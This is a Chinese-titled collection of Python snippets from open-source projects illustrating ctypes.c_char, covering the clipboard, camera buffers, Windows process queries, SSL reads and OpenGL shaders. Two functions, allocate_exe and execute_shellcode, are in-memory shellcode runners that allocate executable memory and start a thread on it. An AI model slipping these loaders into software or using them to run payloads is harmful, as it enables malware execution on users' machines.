我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用ctypes.c_char()。
def clip_files(file_list):
    """Place a list of file paths on the Windows clipboard as CF_HDROP data.

    A zero-initialised byte buffer is laid out as a ``DROPFILES`` header
    followed by the paths as NUL-terminated wide strings; the extra wide
    character reserved at the end stays zero and terminates the list.

    :param file_list: sequence (it is iterated twice) of byte-string paths;
        each one is decoded with ``path.decode('gbk')``.
    """
    offset = ctypes.sizeof(DROPFILES)
    # One wide char per input byte plus a terminator per path, plus the
    # final list terminator.
    length = sum(len(p) + 1 for p in file_list) + 1
    size = offset + length * ctypes.sizeof(ctypes.c_wchar)
    buf = (ctypes.c_char * size)()

    df = DROPFILES.from_buffer(buf)
    df.pFiles, df.fWide = offset, True

    for path in file_list:
        path = path.decode('gbk')
        print("copying to clipboard, filename = " + path)
        array_t = ctypes.c_wchar * (len(path) + 1)
        path_buf = array_t.from_buffer(buf, offset)
        path_buf.value = path
        offset += ctypes.sizeof(path_buf)

    stg = pythoncom.STGMEDIUM()
    stg.set(pythoncom.TYMED_HGLOBAL, buf)

    win32clipboard.OpenClipboard()
    try:
        # EmptyClipboard is inside the try so that a failure here still
        # releases the clipboard in the finally clause.
        win32clipboard.EmptyClipboard()
        win32clipboard.SetClipboardData(win32clipboard.CF_HDROP, stg.data)
        print("clip_files() succeed")
    finally:
        win32clipboard.CloseClipboard()
def synchronized(obj, lock=None):
    """Return a synchronized wrapper around the ctypes object *obj*.

    Simple ctypes values are wrapped in ``Synchronized``, ``c_char`` arrays
    in ``SynchronizedString`` and other arrays in ``SynchronizedArray``.
    For any other object a ``SynchronizedBase`` subclass exposing one
    property per entry of ``_fields_`` is created on first use and cached in
    ``class_cache``.

    :param obj: the ctypes object to wrap; must not already be synchronized.
    :param lock: passed through unchanged to the wrapper constructor.
    """
    assert not isinstance(obj, SynchronizedBase), 'object already synchronized'

    if isinstance(obj, ctypes._SimpleCData):
        return Synchronized(obj, lock)

    if isinstance(obj, ctypes.Array):
        if obj._type_ is ctypes.c_char:
            return SynchronizedString(obj, lock)
        return SynchronizedArray(obj, lock)

    # Anything else is treated as a type with ``_fields_``.
    cls = type(obj)
    try:
        wrapper_cls = class_cache[cls]
    except KeyError:
        members = {}
        for field in cls._fields_:
            field_name = field[0]
            members[field_name] = make_property(field_name)
        wrapper_name = 'Synchronized' + cls.__name__
        wrapper_cls = type(wrapper_name, (SynchronizedBase,), members)
        class_cache[cls] = wrapper_cls
    return wrapper_cls(obj, lock)

#
# Functions for pickling/unpickling
#
def simxGetLastErrors(clientID, operationMode):
    '''
    Please have a look at the function description/documentation in the V-REP user manual

    Returns ``(ret, errors)``. ``errors`` is a list of strings decoded from
    the consecutive NUL-terminated strings the native call hands back; it is
    empty when ``ret`` is non-zero.
    '''
    messages = []
    count = ct.c_int()
    raw = ct.POINTER(ct.c_char)()
    ret = c_GetLastErrors(clientID, ct.byref(count), ct.byref(raw), operationMode)
    if ret != 0:
        return ret, messages

    is_py3 = sys.version_info[0] == 3
    pos = 0
    for _ in range(count.value):
        chunk = bytearray()
        while raw[pos] != b'\0':
            if is_py3:
                chunk.append(int.from_bytes(raw[pos], 'big'))
            else:
                chunk.append(raw[pos])
            pos += 1
        pos += 1  # step over the terminating NUL
        if is_py3:
            messages.append(str(chunk, 'utf-8'))
        else:
            messages.append(str(chunk))
    return ret, messages
def simxGetStringParameter(clientID, paramIdentifier, operationMode):
    '''
    Please have a look at the function description/documentation in the V-REP user manual

    Returns ``(ret, text)``. ``text`` is the NUL-terminated string written
    by the native call, or an empty string when ``ret`` is non-zero.
    '''
    value_ptr = ct.POINTER(ct.c_char)()
    ret = c_GetStringParameter(clientID, paramIdentifier, ct.byref(value_ptr), operationMode)

    is_py3 = sys.version_info[0] == 3
    collected = bytearray()
    if ret == 0:
        pos = 0
        # Copy bytes up to, but not including, the terminating NUL.
        while value_ptr[pos] != b'\0':
            if is_py3:
                collected.append(int.from_bytes(value_ptr[pos], 'big'))
            else:
                collected.append(value_ptr[pos])
            pos += 1

    if is_py3:
        text = str(collected, 'utf-8')
    else:
        text = str(collected)
    return ret, text
def simxGetDialogInput(clientID, dialogHandle, operationMode):
    '''
    Please have a look at the function description/documentation in the V-REP user manual

    Returns ``(ret, text)``. ``text`` is the NUL-terminated string written
    by the native call, or an empty string when ``ret`` is non-zero.
    '''
    text_ptr = ct.POINTER(ct.c_char)()
    ret = c_GetDialogInput(clientID, dialogHandle, ct.byref(text_ptr), operationMode)

    is_py3 = sys.version_info[0] == 3
    collected = bytearray()
    if ret == 0:
        pos = 0
        # Copy bytes up to, but not including, the terminating NUL.
        while text_ptr[pos] != b'\0':
            if is_py3:
                collected.append(int.from_bytes(text_ptr[pos], 'big'))
            else:
                collected.append(text_ptr[pos])
            pos += 1

    if is_py3:
        text = str(collected, 'utf-8')
    else:
        text = str(collected)
    return ret, text
def _get_video_data(id_, timeout, buffer_=None): if buffer_ is None: whbi = _get_roi_format(id_) sz = whbi[0] * whbi[1] if whbi[3] == ASI_IMG_RGB24: sz *= 3 elif whbi[3] == ASI_IMG_RAW16: sz *= 2 buffer_ = bytearray(sz) else: if not isinstance(buffer_, bytearray): raise TypeError('Supplied buffer must be a bytearray') sz = len(buffer_) cbuf_type = c.c_char * len(buffer_) cbuf = cbuf_type.from_buffer(buffer_) r = zwolib.ASIGetVideoData(id_, cbuf, sz, int(timeout)) if r: raise zwo_errors[r] return buffer_
def _get_data_after_exposure(id_, buffer_=None): if buffer_ is None: whbi = _get_roi_format(id_) sz = whbi[0] * whbi[1] if whbi[3] == ASI_IMG_RGB24: sz *= 3 elif whbi[3] == ASI_IMG_RAW16: sz *= 2 buffer_ = bytearray(sz) else: if not isinstance(buffer_, bytearray): raise TypeError('Supplied buffer must be a bytearray') sz = len(buffer_) cbuf_type = c.c_char * len(buffer_) cbuf = cbuf_type.from_buffer(buffer_) r = zwolib.ASIGetDataAfterExp(id_, cbuf, sz) if r: raise zwo_errors[r] return buffer_
def ppid(self):
    """Parent Process ID

    :type: :class:`int`
    """
    from_32_to_64 = windows.current_process.bitness == 32 and self.bitness == 64
    if not from_32_to_64:
        info = PROCESS_BASIC_INFORMATION()
        # Information class 0 is queried into PROCESS_BASIC_INFORMATION.
        winproxy.NtQueryInformationProcess(self.handle, 0, info)
        return info.InheritedFromUniqueProcessId

    # 32-bit caller inspecting a 64-bit target: query through the
    # 32-to-64 helper into a raw buffer sized for the 64-bit layout.
    remote_type = windows.remotectypes.transform_type_to_remote64bits(PROCESS_BASIC_INFORMATION)
    raw = (ctypes.c_char * ctypes.sizeof(remote_type))()
    windows.syswow64.NtQueryInformationProcess_32_to_64(
        self.handle,
        ProcessInformation=raw,
        ProcessInformationLength=ctypes.sizeof(remote_type))
    # Map a remote64bits(PROCESS_BASIC_INFORMATION) at the address of 'raw'
    info = remote_type(ctypes.addressof(raw), windows.current_process)
    return info.InheritedFromUniqueProcessId
def peb_syswow_addr(self):
    """Return the PEB base address reported by NtQueryInformationProcess.

    :raises ValueError: if ``self.is_wow_64`` is false.
    """
    if not self.is_wow_64:
        raise ValueError("Not a syswow process")

    if windows.current_process.bitness != 64:
        # Current process is 32 bits: query through the 32-to-64 helper into
        # a raw buffer laid out like the 64-bit structure.
        remote_type = windows.remotectypes.transform_type_to_remote64bits(PROCESS_BASIC_INFORMATION)
        raw = (ctypes.c_char * ctypes.sizeof(remote_type))()
        windows.syswow64.NtQueryInformationProcess_32_to_64(
            self.handle,
            ProcessInformation=raw,
            ProcessInformationLength=ctypes.sizeof(remote_type))
        peb_offset = remote_type.PebBaseAddress.offset
        # The field is read as a little-endian unsigned 64-bit value.
        (peb_addr,) = struct.unpack("<Q", raw[peb_offset:peb_offset + 8])
        return peb_addr

    info = PROCESS_BASIC_INFORMATION()
    winproxy.NtQueryInformationProcess(self.handle, 0, info)
    return ctypes.cast(info.PebBaseAddress, PVOID).value

# Not a fixedproperty to prevent ref-cycle and uncollectable WinProcess
# Try with a weakref ?
def try_enc():
    """Encode ``x.wav`` to ``x.mp3`` with LAME, 512 bytes of input at a time.

    The first 44 bytes of the input (the WAV header) are skipped. Each chunk
    is passed to ``lame_encode_buffer`` as the left channel with a null
    right channel, and the encoded bytes are appended to the output file.
    Both files are closed even if encoding fails part-way through.
    """
    with open('x.wav', 'rb') as inFile, open('x.mp3', 'wb') as outFile:
        inFile.seek(44)  # skip wav header
        lame = LameEncoder(44100, 1, 128)

        # The prototype never changes, so declare it once outside the loop.
        lame.dll.lame_encode_buffer.argtypes = [
            ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int, ctypes.c_int,
            ctypes.POINTER(ctypes.c_char), ctypes.c_int]

        while True:
            inBytes = inFile.read(512)
            # read() returns an empty str (Py2) or bytes (Py3) at EOF; a
            # truthiness test covers both, unlike comparing against ''.
            if not inBytes:
                break

            # Integer division keeps the count an int on Python 3 as well.
            sample_count = len(inBytes) // 2
            output_buff_len = int(1.25 * sample_count + 7200)
            output_buff = (ctypes.c_char * output_buff_len)()

            output_size = lame.dll.lame_encode_buffer(
                lame.lame, inBytes, 0, sample_count,
                output_buff, output_buff_len)
            outFile.write(output_buff[0:output_size])
def allocate_exe(shellcode):
    """Copy *shellcode* into newly allocated memory and run it on a new thread.

    SECURITY WARNING: this executes the supplied bytes as native machine
    code inside the current process. It must never be reachable with
    untrusted input.

    :param shellcode: buffer passed to ``from_buffer``, which requires a
        writable buffer object (for example a ``bytearray``).
    """
    # 0x3000 and 0x40 are the allocation-type and page-protection arguments;
    # per the Win32 documentation these values are MEM_COMMIT | MEM_RESERVE
    # and PAGE_EXECUTE_READWRITE.
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
    # View the caller's buffer as a C char array so it can be passed as the
    # copy source.
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(shellcode)))
    # Start a thread whose entry point is the allocated region.
    ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
    # A timeout of -1 waits without limit for the thread to finish.
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
def execute_shellcode(shellcode):
    """Copy *shellcode* into newly allocated memory and run it on a new thread.

    SECURITY WARNING: this executes the supplied bytes as native machine
    code inside the current process. It must never be reachable with
    untrusted input.

    :param shellcode: the bytes to run; converted to a ``bytearray`` first so
        that ``from_buffer`` receives a writable buffer.
    """
    shellcode=bytearray(shellcode)
    # 0x3000 and 0x40 are the allocation-type and page-protection arguments;
    # per the Win32 documentation these values are MEM_COMMIT | MEM_RESERVE
    # and PAGE_EXECUTE_READWRITE.
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
    # View the bytearray as a C char array so it can be passed as the copy
    # source.
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(shellcode)))
    # Start a thread whose entry point is the allocated region.
    ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
    # A timeout of -1 waits without limit for the thread to finish.
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
def role(self):
    """The iperf3 instance role

    valid roles are 'c'=client and 's'=server

    :rtype: 'c' or 's'
    """
    try:
        role_char = c_char(self.lib.iperf_get_test_role(self._test))
    except TypeError:
        # c_char rejected the raw return value; retry with it converted to
        # a one-character string via chr().
        role_char = c_char(chr(self.lib.iperf_get_test_role(self._test)))

    self._role = role_char.value.decode('utf-8')
    return self._role
def create_read_console(get_text):
    """Build a read-console callback that feeds text from *get_text*.

    The returned callback keeps any input that did not fit into the caller's
    buffer and serves it on later calls before asking *get_text* again.

    :param get_text: called as ``get_text(prompt, add_history)``; returns the
        text to deliver, or ``None`` to make the callback return 0.
    :returns: ``_read_console(p, buf, buflen, add_history)``, which writes
        into ``buf`` and returns 1, or returns 0 when no text is available.
    """
    pending = [None]  # one-slot cell holding encoded input not yet delivered

    def _read_console(p, buf, buflen, add_history):
        if not pending[0]:
            text = get_text(p.decode(ENCODING), add_history)
            if text is None:
                return 0
            pending[0] = text.encode(ENCODING)

        data = pending[0]
        usable = buflen - 2  # two bytes are kept back for b'\n\0'
        dest = (ctypes.c_char * buflen).from_address(
            ctypes.addressof(buf.contents))

        nb = min(len(data), usable)
        dest[:nb] = data[:nb]
        if nb < usable:
            dest[nb:(nb + 2)] = b'\n\0'
        pending[0] = data[nb:]
        return 1

    return _read_console
def FillConsoleOutputCharacter(stream_id, char, length, start):
    """Write *char* to the console *length* times beginning at *start*.

    :param stream_id: key into ``handles`` selecting the console handle.
    :param char: single-character string; it is encoded before the call.
    :param length: number of cells to fill.
    :param start: starting position, passed through unchanged.
    :returns: the written-count reported by the native call.
    """
    console = handles[stream_id]
    fill_byte = c_char(char.encode())
    cell_count = wintypes.DWORD(length)
    written = wintypes.DWORD(0)
    # Note that this is hard-coded for ANSI (vs wide) bytes.
    # The call's own return value is not used.
    _FillConsoleOutputCharacterA(
        console, fill_byte, cell_count, start, byref(written))
    return written.value
def recv_into(self, buffer, nbytes=None):
    """Read up to *nbytes* bytes into *buffer* via ``SSLRead``.

    :param buffer: writable buffer that receives the data.
    :param nbytes: maximum number of bytes to read; defaults to
        ``len(buffer)``.
    :returns: the number of bytes actually read; 0 if already closed.
    :raises socket.timeout: if the read would block and no data was read.
    """
    # Read short on EOF.
    if self._closed:
        return 0

    if nbytes is None:
        nbytes = len(buffer)

    c_view = (ctypes.c_char * nbytes).from_buffer(buffer)
    bytes_read = ctypes.c_size_t(0)

    with self._raise_on_error():
        status = Security.SSLRead(
            self.context, c_view, nbytes, ctypes.byref(bytes_read)
        )

    # Three result codes are treated as "not always errors":
    # errSSLWouldBlock, errSSLClosedGraceful and errSSLClosedNoNotify.
    peer_closed_codes = (SecurityConst.errSSLClosedGraceful,
                         SecurityConst.errSSLClosedNoNotify)
    if status == SecurityConst.errSSLWouldBlock:
        # With zero bytes processed this was a plain timeout. If some data
        # did arrive alongside errSSLWouldBlock, fall through and return a
        # short read instead.
        if bytes_read.value == 0:
            raise socket.timeout("recv timed out")
    elif status in peer_closed_codes:
        # The remote peer closed the connection, so close our side too.
        # There is deliberately no return here: in principle this code can
        # arrive together with data, unlikely as that is.
        self.close()
    else:
        _assert_no_error(status)

    # The read probably succeeded; report however much data was read.
    return bytes_read.value
def __init__(self, array):
    """Initialise via ``CTypeArray.__init__`` with ``c_char`` and *array*."""
    CTypeArray.__init__(self, c_char, array)
def create_shader(self, strings, shader_type):
    """Compile *strings* as one shader and attach it to ``self.handle``.

    Nothing happens when *strings* is empty. If compilation fails, the
    shader's info log is printed and the shader is not attached.

    :param strings: sequence of ASCII source strings.
    :param shader_type: shader type constant passed to ``glCreateShader``.
    """
    count = len(strings)
    # No source code means there is nothing to build.
    if count < 1:
        return

    shader = glCreateShader(shader_type)

    # Encode each source string and pack them into a C array of char
    # pointers, then reinterpret that array as the char** that
    # glShaderSource expects.
    encoded = [bytes(source, 'ascii') for source in strings]
    src = (c_char_p * count)(*encoded)
    src_ptr = cast(pointer(src), POINTER(POINTER(c_char)))
    glShaderSource(shader, count, src_ptr, None)

    glCompileShader(shader)

    # The same c_int first receives the compile status and, on failure, the
    # info-log length.
    status = c_int(0)
    glGetShaderiv(shader, GL_COMPILE_STATUS, byref(status))
    if status:
        # All is well, so attach the shader to the program.
        glAttachShader(self.handle, shader)
        return

    # Compilation failed: fetch the log and print it to the console.
    glGetShaderiv(shader, GL_INFO_LOG_LENGTH, byref(status))
    log = create_string_buffer(status.value)
    glGetShaderInfoLog(shader, status, None, log)
    print(log.value)
def tobytes(self):
    """Return the first ``self._len`` bytes of ``self.buffer`` as bytes."""
    # Reinterpret the buffer as a char pointer; slicing it copies the bytes.
    char_ptr = cast(self.buffer, POINTER(c_char))
    return char_ptr[0:self._len]
def _get_tcp_ipv4_sockets():
    """Return the entries of the extended TCP table for ``AF_INET`` as a list."""
    needed = ctypes.c_uint(0)
    try:
        # Probe call with no buffer; its only purpose is to have the
        # required size written into `needed`.
        winproxy.GetExtendedTcpTable(None, ctypes.byref(needed), ulAf=AF_INET)
    except winproxy.IphlpapiError:
        # Deliberately ignored: the probe is allowed to fail once the size
        # has been reported.
        pass

    raw = (ctypes.c_char * needed.value)()
    winproxy.GetExtendedTcpTable(raw, ctypes.byref(needed), ulAf=AF_INET)
    tcp_table = get_MIB_TCPTABLE_OWNER_PID_from_buffer(raw)
    return list(tcp_table.table)
def _get_tcp_ipv6_sockets():
    """Return the entries of the extended TCP table for ``AF_INET6`` as a list."""
    needed = ctypes.c_uint(0)
    try:
        # Probe call with no buffer; its only purpose is to have the
        # required size written into `needed`.
        winproxy.GetExtendedTcpTable(None, ctypes.byref(needed), ulAf=AF_INET6)
    except winproxy.IphlpapiError:
        # Deliberately ignored: the probe is allowed to fail once the size
        # has been reported.
        pass

    raw = (ctypes.c_char * needed.value)()
    winproxy.GetExtendedTcpTable(raw, ctypes.byref(needed), ulAf=AF_INET6)
    tcp_table = get_MIB_TCP6TABLE_OWNER_PID_from_buffer(raw)
    return list(tcp_table.table)